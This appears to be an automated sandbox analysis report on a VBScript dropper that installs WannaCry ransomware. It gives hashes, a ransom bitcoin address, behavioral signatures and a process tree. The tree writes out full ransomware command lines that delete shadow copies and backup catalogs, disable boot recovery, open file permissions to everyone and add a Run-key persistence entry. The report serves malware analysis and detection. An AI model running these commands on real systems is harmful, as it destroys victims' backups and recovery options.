Analysis
-
max time kernel
146s -
max time network
133s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
14-07-2020 07:32
Static task
static1
Behavioral task
behavioral1
Sample
test.vbs
Resource
win7
Behavioral task
behavioral2
Sample
test.vbs
Resource
win10v200430
General
-
Target
test.vbs
-
Size
589B
-
MD5
94d9611bf2c6e0caa430b1b0b808da1e
-
SHA1
723de46bdda58dd345b0c0bfd8bdbc33ea1931ec
-
SHA256
8cf91cb3c0524feabe3b9502aa36ec58003e9e0db849901948cd335caf0e4f66
-
SHA512
6baddf54c364c1c39bccd4f3e78f2b97f62297382c46642f6fc921fb2bc950e3ee44c6f94b5447c13faa028d9bc706ee9784582188e7a07fd3805de836b63e8e
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Temp\@[email protected]
wannacry
13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94
Signatures
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe -
Executes dropped EXE 17 IoCs
Processes:
important.exetaskdl.exe@[email protected]@[email protected]taskhsvc.exetaskse.exe@[email protected]taskdl.exetaskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskse.exe@[email protected]taskdl.exepid process 640 important.exe 2088 taskdl.exe 1148 @[email protected] 1732 @[email protected] 2132 taskhsvc.exe 3668 taskse.exe 3556 @[email protected] 1448 taskdl.exe 3608 taskdl.exe 3940 taskse.exe 1820 @[email protected] 2088 taskdl.exe 3812 taskse.exe 3516 @[email protected] 1668 taskse.exe 3088 @[email protected] 816 taskdl.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 4020 vssadmin.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Drops startup file 2 IoCs
Processes:
important.exedescription ioc process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SDC2BF.tmp important.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SDC2C6.tmp important.exe -
Suspicious use of WriteProcessMemory 81 IoCs
Processes:
description pid process target process PID 3544 wrote to memory of 640 3544 WScript.exe important.exe PID 3544 wrote to memory of 640 3544 WScript.exe important.exe PID 3544 wrote to memory of 640 3544 WScript.exe important.exe PID 640 wrote to memory of 864 640 important.exe attrib.exe PID 640 wrote to memory of 864 640 important.exe attrib.exe PID 640 wrote to memory of 864 640 important.exe attrib.exe PID 640 wrote to memory of 916 640 important.exe icacls.exe PID 640 wrote to memory of 916 640 important.exe icacls.exe PID 640 wrote to memory of 916 640 important.exe icacls.exe PID 640 wrote to memory of 2088 640 important.exe taskdl.exe PID 640 wrote to memory of 2088 640 important.exe taskdl.exe PID 640 wrote to memory of 2088 640 important.exe taskdl.exe PID 640 wrote to memory of 2448 640 important.exe cmd.exe PID 640 wrote to memory of 2448 640 important.exe cmd.exe PID 640 wrote to memory of 2448 640 important.exe cmd.exe PID 2448 wrote to memory of 2596 2448 cmd.exe cscript.exe PID 2448 wrote to memory of 2596 2448 cmd.exe cscript.exe PID 2448 wrote to memory of 2596 2448 cmd.exe cscript.exe PID 640 wrote to memory of 1148 640 important.exe @[email protected] PID 640 wrote to memory of 1148 640 important.exe @[email protected] PID 640 wrote to memory of 1148 640 important.exe @[email protected] PID 640 wrote to memory of 1204 640 important.exe cmd.exe PID 640 wrote to memory of 1204 640 important.exe cmd.exe PID 640 wrote to memory of 1204 640 important.exe cmd.exe PID 1204 wrote to memory of 1732 1204 cmd.exe @[email protected] PID 1204 wrote to memory of 1732 1204 cmd.exe @[email protected] PID 1204 wrote to memory of 1732 1204 cmd.exe @[email protected] PID 1148 wrote to memory of 2132 1148 @[email protected] taskhsvc.exe PID 1148 wrote to memory of 2132 1148 @[email protected] taskhsvc.exe PID 1148 wrote to memory of 2132 1148 @[email protected] taskhsvc.exe PID 640 wrote to memory of 3668 640 important.exe taskse.exe PID 640 wrote to memory of 3668 640 important.exe taskse.exe PID 640 wrote to memory of 3668 640 important.exe taskse.exe PID 640 wrote to memory of 3556 640 important.exe @[email protected] PID 640 wrote to memory of 3556 640 important.exe @[email protected] PID 640 wrote to memory of 3556 640 important.exe @[email protected] PID 640 wrote to memory of 1448 640 important.exe taskdl.exe PID 640 wrote to memory of 1448 640 important.exe taskdl.exe PID 640 wrote to memory of 1448 640 important.exe taskdl.exe PID 640 wrote to memory of 3060 640 important.exe cmd.exe PID 640 wrote to memory of 3060 640 important.exe cmd.exe PID 640 wrote to memory of 3060 640 important.exe cmd.exe PID 3060 wrote to memory of 1740 3060 cmd.exe reg.exe PID 3060 wrote to memory of 1740 3060 cmd.exe reg.exe PID 3060 wrote to memory of 1740 3060 cmd.exe reg.exe PID 1732 wrote to memory of 1036 1732 @[email protected] cmd.exe PID 1732 wrote to memory of 1036 1732 @[email protected] cmd.exe PID 1732 wrote to memory of 1036 1732 @[email protected] cmd.exe PID 1036 wrote to memory of 4020 1036 cmd.exe vssadmin.exe PID 1036 wrote to memory of 4020 1036 cmd.exe vssadmin.exe PID 1036 wrote to memory of 4020 1036 cmd.exe vssadmin.exe PID 1036 wrote to memory of 3888 1036 cmd.exe WMIC.exe PID 1036 wrote to memory of 3888 1036 cmd.exe WMIC.exe PID 1036 wrote to memory of 3888 1036 cmd.exe WMIC.exe PID 640 wrote to memory of 3608 640 important.exe taskdl.exe PID 640 wrote to memory of 3608 640 important.exe taskdl.exe PID 640 wrote to memory of 3608 640 important.exe taskdl.exe PID 640 wrote to memory of 3940 640 important.exe taskse.exe PID 640 wrote to memory of 3940 640 important.exe taskse.exe PID 640 wrote to memory of 3940 640 important.exe taskse.exe PID 640 wrote to memory of 1820 640 important.exe @[email protected] PID 640 wrote to memory of 1820 640 important.exe @[email protected] PID 640 wrote to memory of 1820 640 important.exe @[email protected] PID 640 wrote to memory of 2088 640 important.exe taskdl.exe -
Suspicious use of SetWindowsHookEx 9 IoCs
Processes:
pid process 1148 @[email protected] 1732 @[email protected] 1148 @[email protected] 1732 @[email protected] 3556 @[email protected] 3556 @[email protected] 1820 @[email protected] 3516 @[email protected] 3088 @[email protected] -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Views/modifies file attributes 1 TTPs 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Modifies registry key 1 TTPs 1 IoCs
-
Adds Run entry to start application 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\biiywaghgcpcp303 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\tasksche.exe\"" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run reg.exe -
Loads dropped DLL 8 IoCs
Processes:
taskhsvc.exepid process 2132 taskhsvc.exe 2132 taskhsvc.exe 2132 taskhsvc.exe 2132 taskhsvc.exe 2132 taskhsvc.exe 2132 taskhsvc.exe 2132 taskhsvc.exe 2132 taskhsvc.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
taskhsvc.exepid process 2132 taskhsvc.exe 2132 taskhsvc.exe 2132 taskhsvc.exe 2132 taskhsvc.exe 2132 taskhsvc.exe 2132 taskhsvc.exe -
Suspicious use of AdjustPrivilegeToken 53 IoCs
Processes:
taskse.exevssvc.exeWMIC.exetaskse.exetaskse.exetaskse.exedescription pid process Token: SeTcbPrivilege 3668 taskse.exe Token: SeTcbPrivilege 3668 taskse.exe Token: SeBackupPrivilege 2768 vssvc.exe Token: SeRestorePrivilege 2768 vssvc.exe Token: SeAuditPrivilege 2768 vssvc.exe Token: SeIncreaseQuotaPrivilege 3888 WMIC.exe Token: SeSecurityPrivilege 3888 WMIC.exe Token: SeTakeOwnershipPrivilege 3888 WMIC.exe Token: SeLoadDriverPrivilege 3888 WMIC.exe Token: SeSystemProfilePrivilege 3888 WMIC.exe Token: SeSystemtimePrivilege 3888 WMIC.exe Token: SeProfSingleProcessPrivilege 3888 WMIC.exe Token: SeIncBasePriorityPrivilege 3888 WMIC.exe Token: SeCreatePagefilePrivilege 3888 WMIC.exe Token: SeBackupPrivilege 3888 WMIC.exe Token: SeRestorePrivilege 3888 WMIC.exe Token: SeShutdownPrivilege 3888 WMIC.exe Token: SeDebugPrivilege 3888 WMIC.exe Token: SeSystemEnvironmentPrivilege 3888 WMIC.exe Token: SeRemoteShutdownPrivilege 3888 WMIC.exe Token: SeUndockPrivilege 3888 WMIC.exe Token: SeManageVolumePrivilege 3888 WMIC.exe Token: 33 3888 WMIC.exe Token: 34 3888 WMIC.exe Token: 35 3888 WMIC.exe Token: 36 3888 WMIC.exe Token: SeIncreaseQuotaPrivilege 3888 WMIC.exe Token: SeSecurityPrivilege 3888 WMIC.exe Token: SeTakeOwnershipPrivilege 3888 WMIC.exe Token: SeLoadDriverPrivilege 3888 WMIC.exe Token: SeSystemProfilePrivilege 3888 WMIC.exe Token: SeSystemtimePrivilege 3888 WMIC.exe Token: SeProfSingleProcessPrivilege 3888 WMIC.exe Token: SeIncBasePriorityPrivilege 3888 WMIC.exe Token: SeCreatePagefilePrivilege 3888 WMIC.exe Token: SeBackupPrivilege 3888 WMIC.exe Token: SeRestorePrivilege 3888 WMIC.exe Token: SeShutdownPrivilege 3888 WMIC.exe Token: SeDebugPrivilege 3888 WMIC.exe Token: SeSystemEnvironmentPrivilege 3888 WMIC.exe Token: SeRemoteShutdownPrivilege 3888 WMIC.exe Token: SeUndockPrivilege 3888 WMIC.exe Token: SeManageVolumePrivilege 3888 WMIC.exe Token: 33 3888 WMIC.exe Token: 34 3888 WMIC.exe Token: 35 3888 WMIC.exe Token: 36 3888 WMIC.exe Token: SeTcbPrivilege 3940 taskse.exe Token: SeTcbPrivilege 3940 taskse.exe Token: SeTcbPrivilege 3812 taskse.exe Token: SeTcbPrivilege 3812 taskse.exe Token: SeTcbPrivilege 1668 taskse.exe Token: SeTcbPrivilege 1668 taskse.exe -
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
Processes:
@[email protected]important.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" @[email protected] Set value (str) \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" important.exe -
Wannacry
WannaCry is a ransomware cryptoworm.
-
Blacklisted process makes network request 1 IoCs
Processes:
WScript.exeflow pid process 2 3544 WScript.exe -
Deletes itself 1 IoCs
Processes:
WScript.exepid process 3544 WScript.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\test.vbs"1⤵
- Suspicious use of WriteProcessMemory
- Blacklisted process makes network request
- Deletes itself
PID:3544 -
C:\Users\Admin\AppData\Local\Temp\important.exe"C:\Users\Admin\AppData\Local\Temp\important.exe"2⤵
- Executes dropped EXE
- Drops startup file
- Suspicious use of WriteProcessMemory
- Sets desktop wallpaper using registry
PID:640 -
C:\Windows\SysWOW64\attrib.exeattrib +h .3⤵
- Views/modifies file attributes
PID:864
-
-
C:\Windows\SysWOW64\icacls.exeicacls . /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
PID:916
-
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe3⤵
- Executes dropped EXE
PID:2088
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 230491594719096.bat3⤵
- Suspicious use of WriteProcessMemory
PID:2448 -
C:\Windows\SysWOW64\cscript.execscript.exe //nologo m.vbs4⤵PID:2596
-
-
-
C:\Users\Admin\AppData\Local\Temp\@[email protected]3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
- Suspicious use of SetWindowsHookEx
PID:1148 -
C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\taskhsvc.exeTaskData\Tor\taskhsvc.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:2132
-
-
-
C:\Windows\SysWOW64\cmd.exePID:1204
-
C:\Users\Admin\AppData\Local\Temp\@[email protected]4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
- Suspicious use of SetWindowsHookEx
PID:1732 -
C:\Windows\SysWOW64\cmd.execmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet5⤵
- Suspicious use of WriteProcessMemory
PID:1036 -
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet6⤵
- Interacts with shadow copies
PID:4020
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete6⤵
- Suspicious use of AdjustPrivilegeToken
PID:3888
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3668
-
-
C:\Users\Admin\AppData\Local\Temp\@[email protected]3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Sets desktop wallpaper using registry
PID:3556
-
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe3⤵
- Executes dropped EXE
PID:1448
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "biiywaghgcpcp303" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\tasksche.exe\"" /f3⤵
- Suspicious use of WriteProcessMemory
PID:3060 -
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "biiywaghgcpcp303" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\tasksche.exe\"" /f4⤵
- Modifies registry key
- Adds Run entry to start application
PID:1740
-
-
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe3⤵
- Executes dropped EXE
PID:3608
-
-
C:\Users\Admin\AppData\Local\Temp\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3940
-
-
C:\Users\Admin\AppData\Local\Temp\@[email protected]PID:1820
-
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe3⤵
- Executes dropped EXE
PID:2088
-
-
C:\Users\Admin\AppData\Local\Temp\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3812
-
-
C:\Users\Admin\AppData\Local\Temp\@[email protected]PID:3516
-
-
C:\Users\Admin\AppData\Local\Temp\taskse.exetaskse.exe C:\Users\Admin\AppData\Local\Temp\@[email protected]3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1668
-
-
C:\Users\Admin\AppData\Local\Temp\@[email protected]PID:3088
-
-
C:\Users\Admin\AppData\Local\Temp\taskdl.exetaskdl.exe3⤵
- Executes dropped EXE
PID:816
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:2768
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\@[email protected]
-
C:\Users\Admin\AppData\Local\Temp\@[email protected]
-
C:\Users\Admin\AppData\Local\Temp\@[email protected]
-
C:\Users\Admin\AppData\Local\Temp\@[email protected]
-
C:\Users\Admin\AppData\Local\Temp\@[email protected]
-
C:\Users\Admin\AppData\Local\Temp\@[email protected]
-
C:\Users\Admin\AppData\Local\Temp\@[email protected]
-
C:\Users\Admin\AppData\Local\Temp\@[email protected]
-
C:\Users\Admin\Desktop\@[email protected]